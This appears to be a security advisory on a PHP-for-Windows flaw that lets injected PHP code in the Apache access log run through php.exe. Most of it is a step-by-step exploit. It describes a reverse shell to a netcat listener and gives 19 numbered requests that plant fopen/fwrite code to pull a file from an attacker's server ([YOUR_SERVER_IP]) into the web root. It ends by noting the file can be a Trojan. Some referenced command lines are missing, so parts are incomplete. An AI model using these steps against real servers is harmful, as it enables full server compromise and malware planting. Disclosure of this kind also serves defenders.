A major security vulnerability has been found in PHP for Windows, the vulnerability would allow an attacker exploiting PHP's ability to view files that reside outside the normal HTML root directory to execute arbitrary code by inserting into the Apache log file a malicious PHP based command.
Credit:
The information has been provided by Paul Brereton.
Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0
Exploit (Executing a command):
Assume that a user has installed apache in the location "c:\apache" and that php.exe was installed in the default path of "c:\php\php.exe", the exploit steps to gain root are as follows:
Apache will then add this request line to the access.log file. By requesting the log file with the php.exe exploit you can then run the php system code like this :
The way root is gained is by getting the webserver to do a reverse telnet back to your server running netcat such as the command:
"nc -l -n -v -p "
As you can see, this is a very simple way to compromise the entire server with the php.exe exploit.
Exploit (Uploading a file):
1) Create a text file on your webserver called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing http://[YOUR_SERVER_IP]/mytestfile.txt
5) Check that the file exist on server by typing http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests (If the browser does not seem to connect, do not worry, it is. do not press refresh in any step, otherwise this will not work. Remember to replace the brackets on the first two lines)
7) Make the request in your browser http://www.example.com/<?$fp=fopen("http://[YOUR_SERVER_IP]/mytestfile.txt"," rb");?>
8) Wait for about 10 Seconds
9) Make the request in your browser http://www.example.com/<?$contents=fread($fp,[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?>
10) Wait for about 10 Seconds
11) Make the request in your browser http://www.example.com/<?$fq=fopen("c:/Apache2/htdocs/mytestfile.txt","wb");?>
12) Wait for about 10 Seconds
13) Make the request in your browser http://www.example.com/<?fwrite($fq,$contents);?>
14) Wait for about 10 Seconds
15) Make a request for a non-existent file (To flush the access log) by typing http://www.example.com/nonexistantfile.htm
16) Wait for about 10 seconds
17) Get php.exe to parse the apache logfile by typing http://www.example.com/php/php.exe?c:\apache2\logs\access.log
18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser http://www.example.com/mytestfile.txt
What happens is that php.exe runs the php code that has been logged in the apache log file. The code in the apache log file then tells the server to download the file from your server and save it into the apache directory.
The file uploaded can be a Trojan, exe file, php file, etc. There is no limitation to what and where you can upload.
It is a very simple task to write a Trojan with CGI headers and to execute it once uploaded.
